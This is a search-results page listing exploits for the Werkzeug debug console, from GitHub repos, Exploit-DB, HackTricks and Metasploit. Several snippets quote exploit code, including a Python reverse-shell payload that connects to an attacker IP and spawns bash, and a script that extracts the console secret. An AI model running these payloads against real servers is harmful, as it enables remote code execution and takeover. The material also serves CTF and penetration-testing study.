GitHub
github.com › its-arun › Werkzeug-Debug-RCE
GitHub - its-arun/Werkzeug-Debug-RCE: Python script for exploiting Werkzeug Debug RCE useful for CTF · GitHub
Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.
Starred by 39 users
Forked by 22 users
Languages Python
GitHub
github.com › Fare9 › PyWerkzeug-Debug-Command-Execution
GitHub - Fare9/PyWerkzeug-Debug-Command-Execution: python exploit for werkzeug debug shell command execution · GitHub
python exploit for werkzeug debug shell command execution - Fare9/PyWerkzeug-Debug-Command-Execution
Starred by 10 users
Forked by 8 users
Languages Python
GitHub
github.com › MistSpark › Vigilant-Exploits › blob › master › Werkzeug_Exploit.py
Vigilant-Exploits/Werkzeug_Exploit.py at master · MistSpark/Vigilant-Exploits
payload = '''import os,pty,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('%s',%s));os.dup2(s.fileno(),0);'''\
'''os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash");s.close();'''%(attackerIP,port)
Author MistSpark
GitHub
github.com › grav3m1nd-byte › werkzeug-pin
GitHub - grav3m1nd-byte/werkzeug-pin: Yet another Werkzeug Console Pin Exploit Explanation · GitHub
In this case, we are taking the exploit script a step further and we are relying on subprocess to reuse the HTTP request made by using curl. Doing this helps in dynamically getting the victim server information remotely and without relying on Python's urllib to make these HTTP requests. Once you find out Werkzeug Console is pin-protected, you need to find a way to get this pin and access the debug console, right?
Author grav3m1nd-byte
GitHub
github.com › am0nsec › exploit › blob › master › python › werkzeug-debug-console › exploit.py
exploit/python/werkzeug-debug-console/exploit.py at master · am0nsec/exploit
print(success_message('Werkzeug console successfully found!'))
if 'SECRET' not in resp.text:
    print(error_message('Secret key not found!'))
    sys.exit(1)
secret = re.findall("SECRET = \"([^']{20})", resp.text)[0]
print(info_message('Secret Code: {}\n'.format(secret)))
Author am0nsec
GitHub
github.com › wdahlenburg › werkzeug-debug-console-bypass
GitHub - wdahlenburg/werkzeug-debug-console-bypass: Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. · GitHub
Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. - wdahlenburg/werkzeug-debug-console-bypass
Starred by 64 users
Forked by 7 users
Languages Python 85.8% | Dockerfile 14.2%
GitHub
github.com › magma2 › exploit › blob › master › werkzeug.py
exploit/werkzeug.py at master · magma2/exploit
# usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422

if len(sys.argv) != 5:
    print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0])
    sys.exit(-1)

response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2]))

if "Werkzeug " not in response.text:
Author magma2
HackTricks
book.hacktricks.xyz › home › network services pentesting › pentesting web › werkzeug
Werkzeug / Flask Debug - HackTricks
However, if the HTTP connection ... GitHub - Ruulian/wconsole_extractor: WConsole Extractor is a python library which automatically exploits a Werkzeug development server in debug mode....
GitHub
github.com › rapid7 › metasploit-framework › blob › master › modules › exploits › multi › http › werkzeug_debug_rce.rb
metasploit-framework/modules/exploits/multi/http/werkzeug_debug_rce.rb at master · rapid7/metasploit-framework
This module will exploit the Werkzeug debug console to put down a Python shell. Werkzeug is included with Flask, but not enabled by default. It is also included in other projects, for example the RunServerPlus extension for Django.
Author rapid7
Exploit-DB
exploit-db.com › exploits › 43905
Werkzeug - 'Debug Shell' Command Execution - Multiple remote Exploit
January 28, 2018 - #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%
GitHub
github.com › rapid7 › metasploit-framework › blob › master › documentation › modules › exploit › multi › http › werkzeug_debug_rce.md
metasploit-framework/documentation/modules/exploit/multi/http/werkzeug_debug_rce.md at master · rapid7/metasploit-framework
It may be necessary to set this ... before the request is passed to the application. Determines which algorithm the exploit module will use to generate a pin and cookie....
Author rapid7
Veracode
sca.analysiscenter.veracode.com › vulnerability-database › security › open-redirection › python › sid-27924
Veracode
Exploit-DB
exploit-db.com › exploits › 37814
Werkzeug - Debug Shell Command Execution (Metasploit) - Python remote Exploit
August 18, 2015 - Tested against: 0.9.6 on Debian 0.9.6 on Centos 0.10 on Debian }, 'Author' => 'h00die <mike[at]shorebreaksecurity.com>', 'References' => [ ['URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger'] ], 'License' => MSF_LICENSE, 'Platform' => ['python'], 'Targets' => [[ 'werkzeug 0.10 and older', {}]], 'Arch' => ARCH_PYTHON, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 28 2015' )) register_options( [ OptString.new('TARGETURI', [true, 'URI to the console', '/console']) ], self.class ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(datastore['TAR
GitHub
github.com › Fare9 › PyWerkzeug-Debug-Command-Execution › blob › master › exploit_werkzeug.py
PyWerkzeug-Debug-Command-Execution/exploit_werkzeug.py at master · Fare9/PyWerkzeug-Debug-Command-Execution
python exploit for werkzeug debug shell command execution - Fare9/PyWerkzeug-Debug-Command-Execution
Author Fare9
Veracode
sourceclear.com › vulnerability-database › security › open-redirection › python › sid-27924
Open Redirection Vulnerability in the Werkzeug library